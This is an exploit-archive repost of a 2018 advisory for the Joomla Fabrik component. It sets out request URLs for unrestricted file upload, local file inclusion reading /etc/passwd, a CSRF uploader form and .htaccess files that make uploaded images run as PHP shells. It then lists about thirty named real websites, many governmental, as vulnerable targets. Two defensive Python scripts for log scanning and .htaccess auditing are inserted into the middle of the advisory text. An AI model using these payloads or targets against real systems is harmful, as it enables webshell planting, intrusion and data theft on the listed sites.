Joomla Com_Fabrik pluginAjax importcsv _advancedsearch getprodimg controller LFI with htaccess CSRF

CVE: Not specified
Category: CWE-264
Price: Unknown
Severity: High
Author: Not specified
Risk: High
Exploitation Type: Remote
Date: 2018-11-29
CPE: cpe:/a:joomla:fabrik
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018110238

Below is a copy:

Joomla Com_Fabrik pluginAjax importcsv _advancedsearch getprodimg controller LFI with htaccess CSRF Shell Access Vulnerability
#################################################################################################

# Exploit Title : Joomla Com_Fabrik pluginAjax importcsv _advancedsearch getprodimg controller LFI with htaccess CSRF Shell Access Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 29/11/2018
# Vendor Homepage : extensions.joomla.org/extension/fabrik/ ~ fabrikar.com
# Tested On : Windows and Linux
# Software Download Links : fabrikar.com/downloads
# Category : WebApps
# Version Information : All Current Versions.
# Google Dorks : inurl:''/index.php?option=com_fabrik''
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
+ CWE-434 - [ Unrestricted Upload of File with Dangerous Type PHP ]

#################################################################################################

# Exploit Title : Joomla Com_Fabrik pluginAjax importcsv _advancedsearch getprodimg controller LFI with htaccess CSRF Shell Access Vulnerability

# Admin Panel Login Path : 

/administrator/

#################################################################################################

# Exploit 1 : 

/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

# Error : 

{"filepath":null,"uri":null}

{"error":"Error. Unable to upload file."}

#################################################################################################

# Exploit 2 : 

/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0

Directory File Path : /media/...

#################################################################################################

# Exploit 3 : 

/index.php?option=com_fabrik&format=partial&view=list&layout=_advancedsearch&tmpl=component&listid=11

/index.php?option=com_fabrik&format=partial&view=list&layout=_advancedsearch&tmpl=component&listid=
12&nextview=list&scope=com_fabrik&tkn=[RANDOM-HASH-NUMBERS]

Add and Delete Vulnerability

Note : If the website responds with '' Sorry this form is not published '' when this request is sent, it is not vulnerable; the bug has been fixed.

#################################################################################################

# Exploit 4 : 

/component/fabrik/form/8/index.php?option=com_fabrik&format=raw&controller=plugin&c=plugin&task=userAjax&method=getprodimg

# Example Error :

{"id":8,"model":"table","errors":[],"data":{"___betrieb":[""],"___modell":"","___betreff":"Probefahrt","___firma":"","
___anrede":["0"],"___name":"","___email":"",
"___strasse":"","___plz":"","___ort":"","___telefon":"","___bemerkungen":"","___empfaenger":"","___captcha":"","
___datenschutz":[""]},"html":{"___betrieb":"\r\n","___modell":"","___betreff":"<!-- Probefahrt -->","___firma":"",
"___anrede":"bitte whlen","___name":"","___email":"","___strasse":"","___plz":"","___ort":"","___telefon":"",
"___bemerkungen":"","___empfaenger":"<!-- -->","___captcha":"","___datenschutz":""},"post":
{"option":"com_fabrik","format":"raw","controller":"plugin","c":"plugin","task":"userAjax","method":
"getprodimg\\","Itemid":null,"view":"form","formid":"8","rowid":"index"}}

#################################################################################################

# Exploit 5 : 

/index.php?option=com_fabrik&controller=[Local File Inclusion]

/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00

Note : If the response is '' 0  Call to a member function getData() on null '', the vulnerability has been fixed.
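All five request shapes above share a small number of URL indicators (the com_fabrik fileupload ajax_upload task, a controller value carrying a traversal or null byte, and a follow-up request for the dropped .htaccess). The script below is an added detection example written for this page, not code from the advisory or from the Fabrik project: it parses Apache combined-format access logs, classifies each request against those indicators, and marks an upload POST whose Referer comes from another host as the cross-site shape the CSRF section describes. The log lines are constructed for the demonstration, and the site host name passed to scan_log is an assumption.

```python
"""Flag Joomla Fabrik requests matching this advisory's indicators in Apache access logs."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (not from the advisory) exercising each indicator.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Nov/2018:10:01:02 +0000] "POST /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload HTTP/1.1" 200 61 "http://evil.example/csrf.html" "Mozilla/5.0"
203.0.113.5 - - [29/Nov/2018:10:01:09 +0000] "GET /index.php?option=com_fabrik&controller=../../../../../../etc/passwd%00 HTTP/1.1" 200 1812 "-" "Mozilla/5.0"
198.51.100.7 - - [29/Nov/2018:10:02:00 +0000] "GET /index.php?option=com_fabrik&view=list&listid=3 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Nov/2018:10:02:30 +0000] "GET /media/.htaccess HTTP/1.1" 403 199 "-" "curl/7.61"
"""

# Apache "combined" format: ip ident user [ts] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def classify_request(method, path, referer, site_host):
    """Return the indicator names that match one request (empty list if none)."""
    url = urlsplit(path)
    # parse_qs percent-decodes, so an encoded %00 arrives here as a real NUL byte.
    q = {k: v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    hits = []
    if q.get("option") == "com_fabrik":
        if q.get("task") == "plugin.pluginAjax" and q.get("method") == "ajax_upload":
            hits.append("fabrik_ajax_upload")
            ref_host = urlsplit(referer).hostname if referer not in ("", "-") else None
            # An upload POST referred from a foreign origin is the CSRF shape in the advisory.
            if method == "POST" and ref_host and ref_host != site_host:
                hits.append("cross_site_referer")
        ctrl = q.get("controller", "")
        if "../" in ctrl or "\x00" in ctrl:
            hits.append("fabrik_controller_traversal")
    # Fetching the dropped .htaccess is how a successful upload is confirmed.
    if url.path.endswith("/.htaccess"):
        hits.append("htaccess_requested")
    return hits


def scan_log(text, site_host):
    """Scan log text and return one finding per request that matched any indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hits = classify_request(m["method"], m["path"], m["referer"], site_host)
        if hits:
            findings.append({"ip": m["ip"], "ts": m["ts"],
                             "status": m["status"], "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG, "www.example.org"):  # assumed site host
        print(f"{f['ts']} {f['ip']} {f['status']} {','.join(f['indicators'])}")
```

The Referer check only strengthens the other indicators; browsers may omit or strip it, so an ajax_upload POST with no Referer from a session that never loaded a Fabrik form is still worth a look. A 200 on the traversal request is the strongest single signal here, since the advisory's "fixed" marker for Exploit 5 is an error response rather than a 200.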

#################################################################################################

# CSRF Exploiter Code =>  [ Upload Htaccess File via This Script ] - Save this file as [yourfilename].html

<title>KingSkrupellos - Cyberizm Digital Security Team</title>
<br>
<br>
<center><font size="10">Joomla CSRF Com_Fabrik File Upload Shell Access Exploiter</font></center><br><br>
<form method="POST" action="http://www.[TARGETSITE]/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
<input type="file" name="file"><button>OKAY</button>
</form>

#################################################################################################

# HtAccess File => 

DirectoryIndex cyberizm.html
AddType application/x-httpd-php .png
AddType application/x-httpd-php .gif
AddType application/x-httpd-php .jpg
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .fla
AddType application/x-httpd-php .php
AddType application/x-httpd-php .asp
AddType application/x-httpd-php .js
AddType application/x-httpd-php .shtml
AddType application/x-httpd-php .html
AddType application/x-httpd-php .htm

# or you can use this

DirectoryIndex index.html
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .fla
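The two .htaccess variants above work by remapping image and text extensions to the PHP handler and pointing DirectoryIndex at a dropped page, so a post-incident check for this technique is to look for exactly those directives inside upload directories where no .htaccess should exist. The script below is an added forensic example written for this page, not code from the advisory or from Joomla or Fabrik: it walks the upload directories under a Joomla root, flags AddType/AddHandler/SetHandler lines that bind a type to application/x-httpd-php, and reports DirectoryIndex overrides for review. The fixture tree it builds in a temporary directory is constructed for the demonstration; the set of upload directory names is an assumption.

```python
"""Audit a Joomla tree for .htaccess files that turn uploads into executable PHP."""
import os
import re
import tempfile

# Any of these directives bound to the PHP handler makes "static" uploads executable;
# AddHandler/SetHandler are included because they achieve the same effect as AddType.
HANDLER_RE = re.compile(r"^\s*(AddType|AddHandler|SetHandler)\s+application/x-httpd-php\b", re.I)
INDEX_RE = re.compile(r"^\s*DirectoryIndex\s+\S", re.I)


def audit_htaccess(path):
    """Return (line number, directive, reason) for each suspicious line in one .htaccess."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            if HANDLER_RE.match(line):
                findings.append((lineno, line.strip(), "php handler remap"))
            elif INDEX_RE.match(line):
                findings.append((lineno, line.strip(), "DirectoryIndex override"))
    return findings


def audit_tree(root, upload_dirs=("media", "images", "tmp")):
    """Walk the upload directories (assumed names) under a Joomla root; map path -> findings."""
    report = {}
    for sub in upload_dirs:
        for dirpath, _dirs, files in os.walk(os.path.join(root, sub)):
            if ".htaccess" not in files:
                continue
            full = os.path.join(dirpath, ".htaccess")
            hits = audit_htaccess(full)
            if hits:
                report[os.path.relpath(full, root)] = hits
    return report


def build_demo_tree():
    """Constructed fixture: a fake Joomla root with one rogue and one benign .htaccess."""
    root = tempfile.mkdtemp(prefix="joomla_demo_")
    os.makedirs(os.path.join(root, "media", "uploads"))
    os.makedirs(os.path.join(root, "images"))
    with open(os.path.join(root, "media", ".htaccess"), "w") as fh:
        fh.write("DirectoryIndex demo.html\n"
                 "AddType application/x-httpd-php .png\n"
                 "AddType application/x-httpd-php .txt\n")
    with open(os.path.join(root, "images", ".htaccess"), "w") as fh:
        fh.write("Options -Indexes\n")  # benign: no handler change, no index override
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    for rel, hits in audit_tree(demo_root).items():
        for lineno, directive, reason in hits:
            print(f"{rel}:{lineno}: {reason}: {directive}")
```

Finding such a file is evidence that the upload path was reachable, so the next step is to list other recently written files in the same directory rather than only deleting the .htaccess. Setting AllowOverride None for the media and images directories in the server configuration makes a dropped .htaccess inert, which removes the step this technique depends on.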

#################################################################################################

# Exploit 1 => Example Successful Attack Scenario => 

{"filepath":"\/.htaccess","uri":"http:\/\/pn-kebumen.go.id\/.htaccess"}

# Shell Access Path : TARGETDOMAIN/media/[YOURSHELLNAMEHERE.php]

#################################################################################################

# Example Vulnerable Sites =>

[+] pn-kebumen.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] pn-jeneponto.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] pn-sidikalang.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] pn-parepare.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] pn-balige.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] ticketexchange.co.il/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] tiwc.gr/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] labelchip.it/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] halaimemon.org/index.php?option=com_fabrik&format=partial&view=list&layout=_advancedsearch&tmpl=component&listid=11

[+] dakotahistory.org/index.php?option=com_fabrik&format=partial&view=list&layout=_advancedsearch&tmpl=
component&listid=12&nextview=list&scope=com_fabrik&tkn=

[+] volkswagen-automobile-berlin.de/component/fabrik/form/8/index.php?option=com_fabrik&format=raw&controller=
plugin&c=plugin&task=userAjax&method=getprodimg

[+] cyo-no.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] tchoukball.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] lluisoshorta.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] bluejaylodgecostarica.com/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0

[+] aswc.seagrant.uaf.edu/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] wildwood.edu/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] bnetrust.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] seadfoundation.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] edim.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload&lang=fr

[+] tpacharterschool.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] delamoflyers.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] mairie-orsay.fr/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] cfh-aih.fr/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] industriesalon.de/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] ostbayern-kurier.de/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] wanzenschreck.de/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] traditionalscouting.co.uk/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] kabin.no/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] bcsd.us/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.
